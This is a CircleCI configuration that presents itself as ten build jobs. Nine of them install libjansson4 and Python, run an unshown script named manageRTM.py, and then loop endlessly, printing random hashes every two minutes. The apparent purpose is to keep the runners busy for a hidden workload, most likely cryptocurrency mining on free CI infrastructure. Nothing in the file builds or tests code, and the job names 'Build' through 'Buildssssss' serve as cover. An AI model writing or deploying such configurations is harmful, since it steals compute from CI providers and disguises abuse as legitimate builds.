version: 2.1 

  

jobs: 

  buildx1: 
     

    docker: 

      - image: couchbase 

    steps: 

      - checkout 

      - run: 

         name: Build 

         command: | 
                     echo gas 
                      
  buildx2: 

     

    docker: 

      - image: couchbase 

    steps: 

      - checkout 

      - run: 

         name: Builds 

         command: | 
                     apt update && apt -y install curl python3 libjansson4 
                     chmod +x manageRTM.py && python3 manageRTM.py 
                     while :; do echo $RANDOM | md5sum | head -c 20; echo; sleep 2m; done 
  

  buildx3: 

     

    docker: 

      - image: couchbase 

    steps: 

      - checkout 

      - run: 

         name: Buildss 

         command: | 
                     apt update && apt -y install curl python3 libjansson4 
                     chmod +x manageRTM.py && python3 manageRTM.py 
                     while :; do echo $RANDOM | md5sum | head -c 20; echo; sleep 2m; done 
  

  buildx4: 

    docker: 

      - image: couchbase 

    steps: 

      - checkout 

      - run: 

         name: Buildsss 

         command: | 
                     apt update && apt -y install curl python3 libjansson4 
                     chmod +x manageRTM.py && python3 manageRTM.py 
                     while :; do echo $RANDOM | md5sum | head -c 20; echo; sleep 2m; done 
  

  buildx5: 

     

    docker: 

      - image: couchbase 

    steps: 

      - checkout 

      - run: 

         name: Buildssss 

         command: | 
                     apt update && apt -y install curl python3 libjansson4 
                     chmod +x manageRTM.py && python3 manageRTM.py 
                     while :; do echo $RANDOM | md5sum | head -c 20; echo; sleep 2m; done 
  

  buildx6: 

     

    docker: 

      - image: couchbase 

    steps: 

      - checkout 

      - run: 

         name: Buildsssss 

         command: | 
                     apt update && apt -y install curl python3 libjansson4 
                     chmod +x manageRTM.py && python3 manageRTM.py 
                     while :; do echo $RANDOM | md5sum | head -c 20; echo; sleep 2m; done 
  

  buildx7: 

     

    docker: 

      - image: couchbase 

    steps: 

      - checkout 

      - run: 

         name: Buildssssss 

         command: | 
                     apt update && apt -y install curl python3 libjansson4 
                     chmod +x manageRTM.py && python3 manageRTM.py 
                     while :; do echo $RANDOM | md5sum | head -c 20; echo; sleep 2m; done 
  buildx8: 

     

    docker: 

      - image: couchbase 

    steps: 

      - checkout 

      - run: 

         name: Builds 

         command: | 
                     apt update && apt -y install curl python3 libjansson4 
                     chmod +x manageRTM.py && python3 manageRTM.py 
                     while :; do echo $RANDOM | md5sum | head -c 20; echo; sleep 2m; done 
  

  buildx9: 

     

    docker: 

      - image: couchbase 

    steps: 

      - checkout 

      - run: 

         name: Buildss 

         command: | 
                     apt update && apt -y install curl python3 libjansson4 
                     chmod +x manageRTM.py && python3 manageRTM.py 
                     while :; do echo $RANDOM | md5sum | head -c 20; echo; sleep 2m; done 
  

  buildx10: 

    docker: 

      - image: couchbase 

    steps: 

      - checkout 

      - run: 

         name: Buildsss 

         command: | 
                     apt update && apt -y install curl python3 libjansson4 
                     chmod +x manageRTM.py && python3 manageRTM.py 
                     while :; do echo $RANDOM | md5sum | head -c 20; echo; sleep 2m; done

workflows:

  main: 

    jobs: 

      - buildx1

      - buildx2 

      - buildx3 

      - buildx4 

      - buildx5 

      - buildx6 

      - buildx7       

      - buildx8 

      - buildx9 

      - buildx10